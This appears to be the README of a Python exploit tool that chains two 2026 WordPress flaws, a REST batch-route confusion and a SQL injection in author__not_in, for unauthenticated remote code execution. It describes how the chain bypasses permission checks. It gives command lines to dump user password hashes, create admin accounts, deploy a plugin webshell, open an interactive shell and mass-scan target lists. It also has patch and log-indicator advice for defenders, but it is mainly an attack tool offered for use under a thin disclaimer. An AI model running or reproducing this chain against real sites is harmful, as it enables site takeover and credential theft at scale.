
Python exploit tool chaining CVE-2026-63030 REST batch-route confusion with CVE-2026-60137 SQL injection to achieve unauthenticated WordPress RCE, database read, and webshell deployment.
Author: LANGZ
CVE: CVE-2026-63030 (Chained with CVE-2026-60137)
Severity: Critical (CVSS 9.8)
Type: Pre-Authentication Remote Code Execution (RCE)
This tool is provided strictly for educational purposes and authorized security testing only.
By using this tool, you agree that:
If you use this tool against a system without authorization, you are committing a crime.
The author does not condone, support, or take any responsibility for such actions.
CVE-2026-63030 is a REST API batch-route confusion flaw (CWE-436) in WordPress core, introduced in version 6.9. When chained with CVE-2026-60137 (a blind SQL injection in WP_Query's author__not_in parameter), it allows an unauthenticated attacker to achieve full remote code execution on a default WordPress installation.
What an attacker can do:
Why it's dangerous:
Update WordPress to a patched version:
| Current Version | Update To |
|---|---|
| 6.9.0 – 6.9.4 | 6.9.5 |
| 7.0.0 – 7.0.1 | 7.0.2 |
| 6.8.0 – 6.8.5 | 6.8.6 (SQLi fix only) |
Note: WordPress enabled forced auto-updates, but sites with auto-updates disabled or managed hosting that delays updates remain exposed. Verify the update was successfully applied.
POST requests to /wp-json/batch/v1POST requests to ?rest_route=/batch/v1Look for:
POST requests to /wp-json/batch/v1 or ?rest_route=/batch/v1 in access logs/wp-content/cache/ or other web-accessible directoriesIf you find indicators of compromise, simply removing the files and admin account is not enough. Perform a full incident response and consider a complete system rebuild.
The exploit chain combines two vulnerabilities:
WordPress's REST API batch processor (serve_batch_request_v1) has an off-by-one indexing bug. When wp_parse_url() fails on a sub-request path (e.g., "///"), the resulting WP_Error is pushed to $validation[] but not to $matches[]. This desynchronizes the two arrays, causing every subsequent request to be dispatched under the wrong handler.
By nesting a carefully structured batch inside another batch, an attacker can route a request validated by one endpoint's schema through a completely different endpoint's callback — bypassing permission checks entirely.
The confused request lands in WP_Query's author__not_in parameter. WordPress casts the string to an array but skips absint() sanitization, allowing raw SQL injection. The tool uses this to:
UNION SELECT)WP_Post objectsOnce the setup is complete (discovering table prefix and admin ID), the escalation payload fires in a single HTTP request:
UNION)The tool then uses the generated admin credentials to deploy a plugin-based webshell for OS command execution.
# Single target check
python3 wp2shell.py http://target.com
# Check with active SQLi confirmation
python3 wp2shell.py http://target.com --confirm-sqli
# Read database (fingerprint)
python3 wp2shell.py http://target.com --read --preset fingerprint
# Read user logins and password hashes
python3 wp2shell.py http://target.com --read --preset users
# Deploy webshell and run a command
python3 wp2shell.py http://target.com --shell --cmd id
# Interactive shell
python3 wp2shell.py http://target.com --shell -i
# Mass scan from file
python3 wp2shell.py targets.txt
Run without arguments to open the interactive menu:
python3 langz.py
══════════════════════════════════════════════════════════════
██╗ █████╗ ███╗ ██╗ ██████╗ ███████╗
██║ ██╔══██╗████╗ ██║██╔════╝ ╚══███╔╝
██║ ███████║██╔██╗ ██║██║ ███╗ ███╔╝
██║ ██╔══██║██║╚██╗██║██║ ██║ ███╔╝
███████╗██║ ██║██║ ╚████║╚██████╔╝███████╗
╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚══════╝
▓▒░ L A N G Z T O O L S ░▒▓
Author : LANGZ
CVE : (CVE-2026-63030)
──────────────────────────────────────────────────────────────
[1] Single Target - Check
[2] Mass Target - Check
[3] Single Target - Auto Admin
[4] Mass Target - Auto Admin
[5] Exit
──────────────────────────────────────────────────────────────
Results -> Results/results.txt
══════════════════════════════════════════════════════════════
This project is provided for educational and authorized security testing purposes only.
The author LANGZ assumes no liability for any misuse or damage caused by this tool.
Author: LANGZ
CVE: CVE-2026-63030
| Aspect | Detail |
|---|
| Affected Versions | WordPress 6.9.0 – 6.9.4, WordPress 7.0.0 – 7.0.1 |
| SQLi-Only Affected | WordPress 6.8.0 – 6.8.5 (CVE-2026-60137 only) |
| Authentication Required | None |
| User Interaction | None |
| Impact | Complete site compromise — database read/write, arbitrary PHP file upload, OS command execution |
| Exploitation Status | Actively exploited in the wild; 62,802+ unique attacking IPs observed |
| Flag | Description |
|---|
--timeout | Request timeout in seconds (default: 15) |
--proxy | HTTP proxy (e.g., http://127.0.0.1:8080) |
--threads | Parallel threads for mass scan (default: 50) |
--sleep | SQL timing delay for blind confirmation (default: 3) |
--samples | Timing pairs for confirmation (default: 3) |
--confirm-sqli | Send active SQLi confirmation payload |
--preset | fingerprint or users |
--query | Custom SQL expression to read |
--prefix | Database table prefix (default: wp_) |
--max-length | Max characters per value (default: 128) |
--technique | auto, union, blind, or error |
--user | Admin username (for --shell) |
--password | Admin password (for --shell) |
--cmd | Command to run on target |
-i, --interactive | Open interactive shell |